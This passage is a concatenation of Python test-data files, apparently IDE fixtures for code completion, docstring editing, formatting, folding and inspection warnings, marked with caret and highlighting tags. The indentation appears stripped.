@rtype:
"""
pass
def foo1():
"""
:return :
"""
```
#### File: testData/completion/chainedCall.py
```python
class X(object):
def testChain(self):
return X()
def g():
return X()
g().testChain().te<caret>
```
#### File: testData/completion/classMethod.py
```python
class B(object):
@classmethod
def xyzzy(cls):
pass
@classmethod
def class_method3(cls):
cls.x<caret>
```
#### File: testData/completion/classNameFromVarName.after.py
```python
class Product:
def doStuff(self): pass
def foo(product):
product.doStuff()
```
#### File: testData/completion/classNameFromVarNameChained.py
```python
class Product:
def doStuff(self): pass
class C:
def foo(self):
self.product.doS<caret>
```
#### File: testData/completion/classPrivateInMethod.py
```python
class Foo:
__BOO = 1
def foo(self):
z = self.__B<caret>
```
#### File: completion/doctest/forInDoctest.py
```python
__author__ = 'ktisha'
def bar():
"""
>>> fo<caret>
"""
```
#### File: testData/completion/dunderPrepareHonourInspectionSettings.py
```python
class A:
def __prep<caret>
class B:
@classmethod
def __prep<caret>
class C:
@decorator
def __prep<caret>
```
#### File: testData/completion/fieldReassignment.py
```python
class C1(object):
def method1(self):
pass
class Test(object):
def __init__(self, x):
self.x = x
self.x = C1()
self.x.meth<caret>
```
#### File: testData/completion/genericTypeInheritor.after.py
```python
from typing import Generic, TypeVar
T = TypeVar('T')
class BaseClass(Generic[T]):
def __init__(self, test: T):
self.test = test
base = BaseClass([1, 2, 3])
base.test
```
#### File: testData/completion/instanceFromInheritedCallAttr.py
```python
class Foo(object):
bar = True
class FooMakerAnc(object):
def __call__(self):
return Foo()
class FooMaker(FooMakerAnc):
pass
fm = FooMaker()
f3 = fm()
f3.b<caret>
```
#### File: testData/completion/localVarInDictKey.py
```python
ENCODINGS = {}
class C:
def foo(self):
if self.id[0] == 'T':
encoding = ord(self.rawData[0])
if 0 <= encoding < len(ENCODINGS):
value = self.rawData[1:].decode(ENCODINGS[enc<caret>])
```
#### File: testData/completion/matMul.after.py
```python
class C:
def __matmul__(self, other):
```
#### File: testData/completion/outerCompletionVariantDoesNotOverwriteClosestOne.after.py
```python
def abracadabra():
abracadabra = "str"
print(abracadabra)
```
#### File: testData/completion/protectedClassNames.after.py
```python
class A:
def _foo(self):
pass
A()._foo()
```
#### File: testData/completion/qualifiedAssignment.py
```python
def foo(a):
woo = []
a.words = {}
for x in w<caret>
```
#### File: testData/completion/slotsAsAllowedNames.after.py
```python
class A(object):
__slots__ = ['foo']
def __init__(self):
self.bar = 1
A().ba
class B:
__slots__ = ['foo']
def __init__(self):
self.bar = 1
B().bar
class C(object):
__slots__ = ['foo', '__dict__']
def __init__(self):
self.bar = 1
C().bar
```
#### File: testData/completion/superMethodWithCommentAnnotation.py
```python
from typing import Dict
class Parent:
def overridable_method(self,
param # type: str
): # type: (...) -> Dict[str, str]
pass
class Child(Parent):
def over<caret>
```
#### File: testData/completion/withType.py
```python
class Eggs(object):
def __enter__(self):
return u'foo'
def __exit__(self, exc_type, exc_val, exc_tb):
pass
class Spam(Eggs):
pass
def f():
with Spam() as spam:
spam.enc<caret>
```
#### File: testData/copyPaste/IndentTabIncrease.after.py
```python
print "Line 2"
class Test:
def __init__(self):
print "Line 2"
print "Line 1"
```
#### File: copyPaste/singleLine/IndentOnTopLevel.dst.py
```python
class C:
def foo(self):
x = 1
y = 2
<caret>
def foo():
pass
```
#### File: testData/debug/test_pyside2_3.py
```python
from PySide2 import QtCore
import sys
class Runnable(QtCore.QRunnable):
def run(self):
app = QtCore.QCoreApplication.instance()
for i in range(3):
print("ping %d" % i)
app.quit()
app = QtCore.QCoreApplication([])
runnable = Runnable()
QtCore.QThreadPool.globalInstance().start(runnable)
sys.exit(app.exec_())
```
#### File: testData/debug/test_set_next_statement.py
```python
def foo(a):
a *= 2
print(a)
x = 0
x += 1
x += 2
while x < 2:
x += 1
print(x)
foo(x)
print("x = %d" % x)
```
#### File: testData/debug/test_two_threads_resume.py
```python
from threading import Thread, RLock
from time import sleep
lock = RLock()
def foo():
sleep(1)
while True:
lock.acquire()
x = 12
sleep(0.01)
lock.release()
print("finished foo()", x)
threads = [Thread(target=foo, name="Thread1"),
Thread(target=foo, name="Thread2")]
for thread in threads:
thread.start()
```
#### File: testData/docstrings/googleDescriptionOfReturnValueOnNextLine.py
```python
def func():
"""
Returns:
int:
return value description
"""
```
#### File: testData/docstrings/googleNoClosingParenthesisAfterParamType.py
```python
def f(x, y):
"""
Args:
x (Foo
y (Bar : description
"""
```
#### File: testData/docstrings/numpyCombinedParamDeclarations.py
```python
def f(x, *args, y, **kwargs):
"""
Parameters
----------
x, *args, **kwargs, y: Any
description
"""
```
#### File: testData/dynamicTypes/1.py
```python
def foo(x):
return x
foo(1)
from time import sleep
sleep(5)
```
#### File: testData/editing/enterDocstringStubWhenClassDocstringBelow.after.py
```python
def f():
"""
Returns:
"""
class Class:
"""
bar
"""
```
#### File: testData/editing/enterDocstringStubWhenClassDocstringBelow.py
```python
def f():
"""<caret>
class Class:
"""
bar
"""
```
#### File: testData/editing/enterNoDocstringStubWhenCodeExampleInDocstring.py
```python
def f():
"""<caret>
Monospaced ``func`` and func
Example:
::
def func():
pass
class Class():
pass
"""
```
#### File: testData/editing/firstParamClassmethod.py
```python
class A(object):
@classmethod
def foo<caret>
```
#### File: testData/editing/firstParamMetaSimple.after.py
```python
class A(type):
def f(cls):
```
#### File: testData/editing/sectionIndentInsideGoogleDocStringCustomIndent.after.py
```python
def f(param):
"""
Args:
param<caret>
"""
```
#### File: testData/editing/spaceDocStringStubInFunction.after.py
```python
def func(x, y, z):
"""
:param x: <caret>
:param y:
:param z:
:return:
"""
```
#### File: testData/findUsages/GlobalUsages.py
```python
<caret>search_variable = 1
def function():
global search_variable
search_variable = 2
print(search_variable)
```
#### File: testData/findUsages/NonGlobalUsages.py
```python
<caret>a = 0
def b():
a = 1
print a
```
#### File: testData/findUsages/UnresolvedClassInit.py
```python
class <caret>B(C):
def __init__(self):
C.__init__(self)
```
#### File: testData/folding/customFolding.py
```python
<fold text='SupportStuff'>#region SupportStuff
class SupportClass(object):<fold text='...'>
pass</fold>
def supportFunction():<fold text='...'>
return</fold>
#endregion</fold>
class ImportantClass(object):<fold text='...'>
<fold text='Class body'>#region Class body
def f(self):<fold text='...'>
return 'hello world'</fold>
#endregion</fold>
pass</fold>
<fold text='VeryImportant'>#region VeryImportant
def importantFunction():<fold text='...'>
if (x > 0):<fold text='...'>
<fold text='Body'>#region Body
print "abc"
#endregion</fold></fold>
return</fold>
pass
#endregion</fold>
```
#### File: testData/formatter/continuationIndentInIndentingStatement.py
```python
if True \
or False:
pass
elif \
False:
pass
for i in \
range(1, 100):
pass
with open('file1') as file1, \
open('file2') as file2:
pass
class \
A(object):
pass
def \
foo():
pass
try:
pass
except \
AttributeError:
pass
while value \
in values: # <- missing continuation indent here
do_smth()
if (1 + x.
value()):
pass
```
#### File: testData/formatter/continuationIndent.py
```python
def long_function_name(
var_one, var_two, var_three,
var_four):
print(var_one)
```
#### File: testData/formatter/indentInGenerator_after.py
```python
def dbl():
return (
(a, a) for a in [])
```
#### File: testData/formatter/noBlankLinesAfterLocalImports.py
```python
from pprint import pprint
VAR = 42
def foo():
import sys
import ast, tokenize
pass
class C:
from textwrap import dedent
pass
import codecs as C
pass
```
#### File: Static/Lambda/file_1.py
```python
def func1(): pass
def func2(): pass
def func3(): pass
def func4(): pass
def func5(): pass
def func6(): pass
def func7(): pass
def func8(): pass
def func9(): pass
def func10(): pass
def func11(): pass
def func12(): pass
def func13(): pass
def func14(): pass
def func15(): pass
def func16(): pass
def func17(): pass
def func18(): pass
```
#### File: Static/Lambda/main.py
```python
from file_1 import *
def target_func(x=func1, y=func2(), z=lambda: func3, w=lambda: func4()):
p1 = lambda: func5()
p2 = lambda: func6
p1(), p2()
def inner(ix=func7, iy=func8(), iz=lambda: func9, iw=lambda: func10()):
func11()
ip = lambda: func12()
ip()
func13()
inner(func14, func15(), lambda: func16, lambda: func17())
return func18
target_<caret>func()
```
#### File: Static/NestedCall/file_1.py
```python
def func1(*args): pass
def func2(*args): pass
def func3(*args): pass
def func4(*args): pass
def func5(*args): pass
def func6(*args): pass
def func7(*args): pass
def func8(*args): pass
def func9(*args): pass
def func10(*args): pass
```
#### File: Static/OverriddenMethod/main.py
```python
from file_1 import A
class B(A):
def target_func(self, p):
p.another_func()
class C(object):
def func1(self, a):
a.target_func(A())
def func2(self):
a = A()
b = B()
a.target_func(b)
def bar1(a):
a.target_func(a)
def bar2(a, b):
atf, btf = a.target_func, b.target_func
bar1(A())
bar2(A(), B())
B().target_<caret>func(A())
```
#### File: testData/highlighting/returnOutsideOfFunction.py
```python
def <info descr="PY.FUNC_DEFINITION">foo</info>():
class <info descr="PY.CLASS_DEFINITION">C</info>:
<error descr="'return' outside of function">return 1</error>
```
#### File: testData/highlighting/spaceBetweenAtAndDecorator.py
```python
<info descr="PY.DECORATOR">@</info> <info descr="PY.DECORATOR">foo</info>
def <info descr="PY.FUNC_DEFINITION">f</info>():
pass
<info descr="PY.DECORATOR">@</info> <info descr="PY.DECORATOR">bar</info>(1, 2, 3)
def <info descr="PY.FUNC_DEFINITION">g</info>():
pass
```
#### File: testData/highlighting/yieldInDefaultValue.py
```python
def f(x=(<error descr="'yield' outside of function">yield 10</error>)):
return x
```
#### File: testData/inspections/AddCallSuperCommentAfterColonPreserved_after.py
```python
class Example1:
def __init__(self):
self.field1 = 1
class Example2(Example1):
def __init__(self): # Some valuable comment here
Example1.__init__(self)
```
#### File: testData/inspections/AddCallSuperCommentsInFunctionBodyPreserved_after.py
```python
class A:
def __init__(self):
pass
class B(A):
def __init__(self):
# comment #1
A.__init__(self)
# comment #2
print 42
```
#### File: testData/inspections/AddCallSuperOptionalAndRequiredParamsNameCollision_after.py
```python
class A:
def __init__(self, a):
pass
class B(A):
def __init__(self, a=1):
A.__init__(self, a)
```
#### File: testData/inspections/AddCallSuperRequiredKeywordOnlyParamAfterSingleStarInSuperInitIsMerged_after.py
```python
class A:
def __init__(self, *, a):
pass
class B(A):
def __init__(self, a):
super().__init__(a=a)
```
#### File: testData/inspections/AddCallSuperSingleStarParamInSuperInit_after.py
```python
class A:
def __init__(self, *, kw_only, optional_kw_only=None):
pass
class B(A):
def __init__(self, *, kw_only):
super().__init__(kw_only=kw_only)
```
#### File: testData/inspections/AddCallSuperSingleStarParamPreserved_after.py
```python
class NormalLR:
def __init__(self, *, tau=None):
self.tau = tau
class GradientLR(NormalLR):
def __init__(self, *, tau=None):
super().__init__(tau=tau)
```
#### File: testData/inspections/AddClassFromTypeComment.py
```python
def f():
x = None # type: <warning descr="Unresolved reference 'MyClass'">My<caret>Class</warning>
```
#### File: testData/inspections/AddClass.py
```python
class XyzzyTest:
def testSimple(self):
c = <caret><error descr="Unresolved reference 'Xyzzy'">Xyzzy</error>()
```
#### File: testData/inspections/AddFunctionFromFString.py
```python
class C:
def method(self):
print(f'{<error descr="Unresolved reference 'my_function'">my<caret>_function</error>()}')
```
#### File: testData/inspections/AddGlobalExistingStatement.py
```python
a = 1
def foo():
global b
print <caret><warning descr="Local variable 'a' might be referenced before assignment">a</warning>
a = 2
print a
foo()
```
#### File: testData/inspections/AddGlobalStatement_after.py
```python
a = 1
def foo():
global a
print a
a = 2
print a
foo()
```
#### File: testData/inspections/AddKwargsToNewMethodIncompatibleWithInit_after.py
```python
class C(object):
def __init__(self, x, y):
pass
def __new__(cls, **kwargs):
pass
```
#### File: testData/inspections/AddSelfFunction.py
```python
class A:
def get_a(self):
pass
def foo(self):
<error descr="Unresolved reference 'get_a'">g<caret>et_a</error>()
```
#### File: testData/inspections/ArgumentEqualDefault.py
```python
def foo(a, b = 345, c = 1):
pass
#PY-3261
foo(1,
<weak_warning descr="Argument equals to default parameter value">345<caret></weak_warning>, c=22)
```
#### File: testData/inspections/ChainedComparison6_after.py
```python
class A:
def foo(self):
if index >= self.current > index - self.history_length:
pass
```
#### File: testData/inspections/ChangeSignatureKeywordAndPositionalParameters_after.py
```python
def f(x, foo=1, bar='spam'):
pass
f(x, 42, bar='spam')
```
#### File: testData/inspections/DefaultArgumentEmptyList_after.py
```python
def bar(args=None):
if args is None:
args = []
```
#### File: testData/inspections/DocstringParams2_after.py
```python
def spam(ham, eggs): # <== PyCharm suggests applying the quickfix here
"""Docstring
@param ham:
@param eggs:
"""
pass
```
#### File: inspections/GoogleDocstringParametersInspection/test.py
```python
def foo1(a, b):
"""
Parameters:
a: foo
b: bar
"""
pass
def foo(a, <weak_warning descr="Missing parameter b in docstring">b</weak_warning>, <weak_warning descr="Missing parameter n in docstring">n</weak_warning>):
"""
Parameters:
a: foo
"""
pass
def foo():
"""
Parameters:
<weak_warning descr="Unexpected parameter a in docstring">a</weak_warning>: foo
"""
pass
def compare(a, b, *, key=None):
"""
Parameters:
a:
b:
key:
"""
pass
def foo(a, <weak_warning descr="Missing parameter c in docstring">c</weak_warning>):
"""
Parameters:
a:
<weak_warning descr="Unexpected parameter b in docstring">b</weak_warning>:
"""
pass
def varagrs_defined_without_stars(x, *args, y, **kwargs):
"""
Args:
x:
args:
y:
kwargs:
"""
def varagrs_dont_exist():
"""
Args:
*<weak_warning descr="Unexpected parameter args in docstring">args</weak_warning>:
**<weak_warning descr="Unexpected parameter kwargs in docstring">kwargs</weak_warning>:
"""
def varagrs_undefined(x, *args, y, **kwargs):
"""
Args:
x:
y:
"""
def no_parameters_declared(x, y):
"""
"""
```
#### File: testData/inspections/GoogleDocStringRemovePositionalVararg.py
```python
def f():
"""
Args:
*ar<caret>gs:
"""
```
#### File: inspections/InconsistentIndentation/test.py
```python
def foo():
<warning descr="Inconsistent indentation: mix of tabs and spaces"> </warning>print "foo"
def bar():
print "foo"
<warning descr="Inconsistent indentation: previous line used tabs, this line uses spaces"> </warning>print "bar"
"""
foo
bar
"""
print foo(
bar,
baz
)
```
#### File: testData/inspections/NumpyDocStringRemoveCombinedVarargParam_after.py
```python
def f():
"""
Parameters
==========
x, **kwargs
no one writes like that
"""
```
#### File: PyAbstractClassInspection/HiddenForAbstractSubclassWithABCSuperclass/abc.py
```python
class ABCMeta:
pass
class ABC(metaclass=ABCMeta):
"""Helper class that provides a standard way to create an ABC using
inheritance.
"""
pass
def abstractmethod(foo):
pass
```
#### File: quickFix/AddABCToSuperclasses/main_import.py
```python
import abc
class A1(abc.ABC):
@abc.abstractmethod
def m1(self):
pass
```
#### File: quickFix/AddImportedABCToSuperclasses/main.py
```python
from abc import ABC, abstractmethod
class A1(ABC):
@abstractmethod
def m1(self):
pass
class A<caret>2(A1):
pass
```
#### File: quickFix/SetABCMetaAsMetaclassPy3/main_import.py
```python
import abc
class A1(metaclass=abc.ABCMeta):
@abc.abstractmethod
def m1(self):
pass
```
#### File: quickFix/SetImportedABCMetaAsMetaclassPy3/main_after.py
```python
from abc import ABCMeta, abstractmethod
class A1(metaclass=ABCMeta):
@abstractmethod
def m1(self):
pass
class A2(A1, metaclass=ABCMeta):
pass
```
#### File: inspections/PyArgumentListInspection/decoratorsPy3K.py
```python
def deco(func, *args):
return func
@deco # <= Here is a false positive.
def myfunc(a, b):
print(a, b)
```
#### File: inspections/PyArgumentListInspection/instanceMethodAsLambda.py
```python
class TestFour():
is_super = lambda self: True if self.__class__.__name__ == 'TestFour' else False
def is_sub(self):
return not self.is_super() # pass: implicit 'self'
```
#### File: inspections/PyArgumentListInspection/multiResolveWhenAllResultsHaveUnmappedParameters.py
```python
class C1:
def foo(self, x):
return self
class C2:
def foo(self, x, y):
return self
def f():
"""
:rtype: C1 | C2
"""
pass
f().foo(<warning descr="Parameter(s) unfilledPossible callees:C1.foo(self: C1, x)C2.foo(self: C2, x, y)">)</warning>
```
#### File: inspections/PyArgumentListInspection/parameterWithDefaultAfterKeywordContainer.py
```python
def foo(**kwargs): pass
two = 0
kw = {}
foo(**kw, <error descr="Python version 2.7 does not allow keyword arguments after **expression">two=1</error>)
```
#### File: PyArgumentListInspection/TimetupleOnAssertedDate/datetime.py
```python
class date:
def timetuple(self):
pass
try:
from _datetime import *
except:
pass
```
#### File: inspections/PyArgumentListInspection/tuples.py
```python
ab = ((1, 2), (3, 4))
def f(*args):
return args
f(*ab) # pass
```
#### File: PyAsyncCallInspection/CorrectAsyncioCorCall/a.py
```python
import asyncio
@asyncio.coroutine
def foo():
return 24
@asyncio.coroutine
def baz():
yield from foo()
@asyncio.coroutine
def gen():
return foo()
@asyncio.coroutine
def wrap(co):
res = yield from co
return res
```
#### File: inspections/PyAttributeOutsideInitInspection/baseClassAttrs.py
```python
class Base(object):
class_field = 1
class Child(Base):
def f(self):
self.class_field = 3
```
#### File: inspections/PyAttributeOutsideInitInspection/fromSuperHierarchy.py
```python
__author__ = 'ktisha'
class Base(object):
def __init__(self):
self.my = 1
class Child(Base):
def f(self):
self.my = 1
```
#### File: inspections/PyAttributeOutsideInitInspection/propertyNotSetInInit.py
```python
class C(object):
def __init__(self, value):
pass
def getx(self):
return self._x
def setx(self, value):
<weak_warning descr="Instance attribute _x defined outside __init__">self._x</weak_warning> = value
x = property(getx, setx, doc="The 'x' property.")
```
#### File: inspections/PyCallingNonCallableInspection/afterModifierWrappingCall.py
```python
def f(x):
print(x)
class A:
fn = staticmethod(f)
def do(self, x):
self.fn(x)
```
#### File: inspections/PyCallingNonCallableInspection/callableClassDecorator.py
```python
class D(object):
def __init__(self, attribute, value):
pass
def __call__(self, cls):
return cls
@D("value", 42)
class C(object):
pass
a = C()
print(a.value)
```
#### File: inspections/PyCallingNonCallableInspection/explicitClassObjectTypeAnnotation.py
```python
from typing import Type
class MyClass(object):
pass
def func(param):
# type: (Type[MyClass]) -> MyClass
param()
```
#### File: inspections/PyCallingNonCallableInspection/genericClassObjectTypeAnnotation.py
```python
from typing import TypeVar, Type
class User:
pass
U = TypeVar('U', bound=User)
def new_user(user_class):
# type: (Type[U]) -> U
return user_class()
```
#### File: inspections/PyClassHasNoInitInspection/initInParentClass.py
```python
__author__ = 'ktisha'
class Base(object):
def __init__(self):
self.my = 1
class Child(Base): # <- Child class here should not be highlighted since
# it has the __init__ method of the Base class.
pass
```
#### File: inspections/PyClassHasNoInitInspection/new.py
```python
class Test(object):
def __new__(cls, foo): # False positive
self = super(Test, cls).__new__(cls)
self.foo = foo
return self
def bar(self):
return self.foo
t = Test(42)
print(t.bar())
```
#### File: inspections/PyDataclassInspection/attrsInitializersAndValidators.py
```python
import attr
@attr.s
class A:
x = attr.ib()
@x.default
def init_x1(self):
return 10
@x.validator
def check_x1(self, attribute, value):
pass
@attr.s
class A:
x = attr.ib()
@x.default
def init_x2<error descr="'init_x2' should take only 1 parameter">(self, attribute, value)</error>:
return 10
@x.validator
def check_x2<error descr="'check_x2' should take only 3 parameters">(self)</error>:
pass
```
#### File: inspections/PyDataclassInspection/helpersArgumentInStdInheritance.py
```python
import dataclasses
from typing import Type, Union
@dataclasses.dataclass
class Base:
pass
class A(Base):
pass
dataclasses.fields(A)
dataclasses.fields(A())
dataclasses.asdict(<warning descr="'dataclasses.asdict' method should be called on dataclass instances">A()</warning>)
dataclasses.astuple(A())
dataclasses.replace(A())
@dataclasses.dataclass
class B(Base):
pass
dataclasses.fields(B)
dataclasses.fields(B())
dataclasses.asdict(B())
dataclasses.astuple(B())
dataclasses.replace(B())
dataclasses.asdict(<warning descr="'dataclasses.asdict' method should be called on dataclass instances">B</warning>)
dataclasses.astuple(<warning descr="'dataclasses.astuple' method should be called on dataclass instances">B</warning>)
dataclasses.replace(<warning descr="'dataclasses.replace' method should be called on dataclass instances">B</warning>)
def unknown(p):
dataclasses.fields(p)
dataclasses.asdict(p)
dataclasses.astuple(p)
def structural(p):
print(len(p))
dataclasses.fields(p)
dataclasses.asdict(p)
dataclasses.astuple(p)
dataclasses.replace(p)
def union1(p: Union[A, B]):
dataclasses.fields(p)
dataclasses.asdict(p)
dataclasses.astuple(p)
dataclasses.replace(p)
def union2(p: Union[Type[A], Type[B]]):
dataclasses.fields(p)
dataclasses.asdict(<warning descr="'dataclasses.asdict' method should be called on dataclass instances">p</warning>)
dataclasses.astuple(<warning descr="'dataclasses.astuple' method should be called on dataclass instances">p</warning>)
dataclasses.replace(<warning descr="'dataclasses.replace' method should be called on dataclass instances">p</warning>)
```
#### File: inspections/PyDataclassInspection/wrongDunderPostInitSignatureInStdHierarchy.py
```python
import dataclasses
@dataclasses.dataclass
class A1:
a: int
b: dataclasses.InitVar[str]
def __post_init__(self, b: str):
print(f"b: {b}")
@dataclasses.dataclass
class B1(A1):
c: dataclasses.InitVar[int]
def __post_init__(self, b: str, c: int):
super(B1, self).__post_init__(b)
print(f"c: {c}")
@dataclasses.dataclass
class B2(A1):
c: dataclasses.InitVar[int]
def __post_init__<error descr="'__post_init__' should take all init-only variables (incl. inherited) in the same order as they are defined">(self, c: int)</error>:
print(f"c: {c}")
```
#### File: inspections/PyDataclassInspection/wrongDunderPostInitSignature.py
```python
import dataclasses
@dataclasses.dataclass
class A:
a: int
b: dataclasses.InitVar[str]
c: dataclasses.InitVar[bytes]
def __post_init__<error descr="'__post_init__' should take all init-only variables in the same order as they are defined">(self)</error>:
pass
@dataclasses.dataclass
class B:
a: int
b: dataclasses.InitVar[str]
c: dataclasses.InitVar[bytes]
def __post_init__<warning descr="'__post_init__' should take all init-only variables in the same order as they are defined">(self, c, b)</warning>:
pass
```
#### File: inspections/PyDictDuplicateKeysInspection/test.py
```python
dict = {<warning descr="Dictionary contains duplicate keys 'key_1'">key_1</warning> : 1, key_2: 2, <warning descr="Dictionary contains duplicate keys 'key_1'">key_1</warning> : 3}
dict = {'key_1' : 1, <warning descr="Dictionary contains duplicate keys 'key_2'">'key_2'</warning>: 2, <warning descr="Dictionary contains duplicate keys 'key_2'">'key_2'</warning> : 3}
a = {}
{'key_1' : 1, 'key_2': 2}
import random
def foo():
return random.random()
{foo(): 1, foo():2}
# PY-2511
dict = dict([(<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 666), (<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 123)])
dict = dict(((<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 666), (<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 123)))
dict = dict(((<warning descr="Dictionary contains duplicate keys 'key'">'key'</warning>, 666), ('k', 123)), <warning descr="Dictionary contains duplicate keys 'key'">key</warning>=4)
dict([('key', 666), ('ky', 123)])
# PY-27375
d = {<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 1, <warning descr="Dictionary contains duplicate keys 'a'">"a"</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>, 1), (<warning descr="Dictionary contains duplicate keys 'a'">"a"</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys '1'">1</warning>: 1, <warning descr="Dictionary contains duplicate keys '1'">1</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys '1'">1</warning>, 1), (<warning descr="Dictionary contains duplicate keys '1'">1</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys 'True'">True</warning>: 1, <warning descr="Dictionary contains duplicate keys 'True'">True</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys 'True'">True</warning>, 1), (<warning descr="Dictionary contains duplicate keys 'True'">True</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys 'None'">None</warning>: 1, <warning descr="Dictionary contains duplicate keys 'None'">None</warning>: 2}
d = dict([(<warning descr="Dictionary contains duplicate keys 'None'">None</warning>, 1), (<warning descr="Dictionary contains duplicate keys 'None'">None</warning>, 2)])
d = {<warning descr="Dictionary contains duplicate keys '11'">11</warning>: 1, <warning descr="Dictionary contains duplicate keys '11'">1_1</warning>: 1}
d = {<warning descr="Dictionary contains duplicate keys '11.1'">11.1</warning>: 1, <warning descr="Dictionary contains duplicate keys '11.1'">1_1.1</warning>: 1}
d = {<warning descr="Dictionary contains duplicate keys '11j'">11j</warning>: 1, <warning descr="Dictionary contains duplicate keys '11j'">1_1j</warning>: 1}
d = {11j: 1, 11: 1}
d = {<warning descr="Dictionary contains duplicate keys '0'">0j</warning>: 1, <warning descr="Dictionary contains duplicate keys '0'">0</warning>: 2}
{
<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 1,
<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 2,
<warning descr="Dictionary contains duplicate keys 'a'">'a'</warning>: 3,
}
# PY-30423
a = {
1: 2,
'1': 2,
}
```
#### File: PyDocstringInspection/src/test.py
```python
class A:
pass
def foo():
pass
class B:
""""""
pass
def bar():
""""""
pass
class C:
@property
def x(self):
return 42
@x.setter
def x(self, value):
pass
@x.deleter
def x(self):
pass
```
#### File: PyMethodFirstArgAssignmentInspection/src/first-args.py
```python
def self(): # ok
pass
self = 1 # ok
class A:
def foo(self, a):
(self, (a, b)) = 1, ((22, 23))
if 1:
a = {}
self = 23
for (self, a) in []:
pass
def boo():
self = 1
def moo(self):
def inner_moo():
self =1
def self():
pass
class self:
pass
@classmethod
def qoo(cls):
cls = 1
# no builtins detection -> can't test static methods :( where's mock Python SDK?
@staticmethod
def stat(first):
first = 1 # ok
```
#### File: inspections/PyMethodMayBeStaticInspection/attributeNamedSelf.py
```python
x = object()
x.self = 42
class C:
def <weak_warning descr="Method 'method' may be 'static'">method</weak_warning>(self):
print(x.self)
```
#### File: inspections/PyMethodMayBeStaticInspection/overwrittenMethod.py
```python
class A:
def f(self, a):
print "A"
class B(A):
def f(self, a):
print "B"
```
#### File: inspections/PyMethodMayBeStaticInspection/selfName.py
```python
__author__ = 'ktisha'
class A():
def my_method(my_inst):
my_inst.do_smth()
```
#### File: inspections/PyMethodMayBeStaticInspection/staticMethod.py
```python
__author__ = 'ktisha'
class Foo(object):
@staticmethod
def foo(param): # <- method here should not be highlighted
return "foo"
```
#### File: inspections/PyMethodMayBeStaticInspection/superSamePy3.py
```python
class B:
def foo(self, text):
print(type(self), text)
class C(B):
def foo(self, text):
super().foo(text)
```
#### File: inspections/PyMethodOverridingInspection/ArgsKwargsAsAllowAnything.py
```python
class B1:
def foo(self, a, b):
pass
class C1(B1):
def foo(self, *b):
pass
class B2:
def foo(self, **kwargs):
pass
class C2(B2):
def foo(self):
pass
class B3:
def foo(self, *args):
pass
class C3(B3):
def foo(self):
pass
```
#### File: inspections/PyMethodOverridingInspection/LessParametersAndKwargs.py
```python
class B:
def foo(self, arg1, arg2=None, arg3=None, arg4=None):
pass
class C(B):
def foo(self, arg1, arg2=None, arg3=None, **kwargs): #pass
pass
```
#### File: inspections/PyNoneFunctionAssignmentInspection/pass.py
```python
__author__ = 'ktisha'
def foo():
pass
<weak_warning descr="Function 'foo' doesn't return anything">b = foo()</weak_warning>
```
#### File: inspections/PyNumpyType/ArrayLike.py
```python
def asarray(a, dtype=None, order=None):
"""Convert the input to an array.
Parameters
----------
a : array_like
Input data, in any form that can be converted to an array. This
includes lists, lists of tuples, tuples, tuples of tuples, tuples
of lists and ndarrays.
dtype : data-type, optional
By default, the data-type is inferred from the input data.
order : {'C', 'F'}, optional
Whether to use row-major (C-style) or
column-major (Fortran-style) memory representation.
Defaults to 'C'.
Returns
-------
out : ndarray
Array interpretation of `a`. No copy is performed if the input
is already an ndarray with matching dtype and order. If `a` is a
subclass of ndarray, a base class ndarray is returned.
"""
return array(a, dtype, copy=False, order=order)
asarray(10)
```
#### File: inspections/PyPep8NamingInspection/functionName.py
```python
def <weak_warning descr="Function name should be lowercase">doStuff</weak_warning>(a): print a
```
#### File: inspections/PyPep8NamingInspection/globals.py
```python
from contextlib import contextmanager
MUST_REFRESH_CACHE = False
@contextmanager
def fresh_per_request_cache():
global MUST_REFRESH_CACHE
orig = MUST_REFRESH_CACHE
MUST_REFRESH_CACHE = True
try:
yield
finally:
MUST_REFRESH_CACHE = orig
```
#### File: PyPep8NamingInspection/ignored/ignoreOnlyOneError.py
```python
def do_stuff(): pass
class <weak_warning descr="Class names should use CamelCase convention">cls</weak_warning>:
def <weak_warning descr="Function name should be lowercase">FuNc</weak_warning>(self,
<weak_warning descr="Argument name should be lowercase">Arg</weak_warning>):
Test = do_stuff()
```
#### File: PyPep8NamingInspection/test/a.py
```python
from unittest import TestCase
class TestX(TestCase):
def testFoo(self):
self.assertTrue(True)
```
#### File: inspections/PyPropertyAccessInspection/overrideAssignment.py
```python
def test_property_override_assignment():
class B(object):
@property
def foo(self):
return 0
@property
def bar(self):
return -1
@property
def baz(self):
return -2
class C(B):
foo = 'foo'
def baz(self):
return 'baz'
def f(self, x):
self.foo = x
<warning descr="Property 'bar' cannot be set">self.bar</warning> = x
self.baz = x
```
#### File: PyProtectedMemberInspection/MemberResolvedToStub/a.py
```python
class Test:
@classmethod
def foo1(cls):
return cls._bar()
def foo2(self, t: Test):
return t._bar()
@staticmethod
def _bar(self):
pass
```
#### File: inspections/PyProtectedMemberInspection/selfField.py
```python
class B:
def __call__(self, event):
self._call_on_plugins("foo")
```
#### File: inspections/PyRedeclarationInspection/conditional.py
```python
def test_conditional(c):
def foo():
pass
if c:
def foo():
pass
try:
def foo():
pass
except:
pass
```
#### File: inspections/PyRedeclarationInspection/staticMethodRedeclaresInstanceMethod.py
```python
class TestClass:
def foo(self):
print(0)
@staticmethod
def <warning descr="Redeclared 'foo' defined above without usage">foo</warning>():
print(1)
```
#### File: inspections/PyRedeclarationInspection/topLevelOverloadImplementationOverloadImplementation.py
```python
from typing import overload
@overload
def foo(value: int) -> str:
pass
def foo(value):
return None
@overload
def foo(value: str) -> str:
pass
def <warning descr="Redeclared 'foo' defined above without usage">foo</warning>(value):
return None
```
#### File: inspections/PyRedeclarationInspection/underscorePrefixed.py
```python
def foo(_a):
_a = 10
l = lambda _a: [_a for _a in []]
f2e = [(f, e) for _a, e, f in [(1, 2, 3)]]
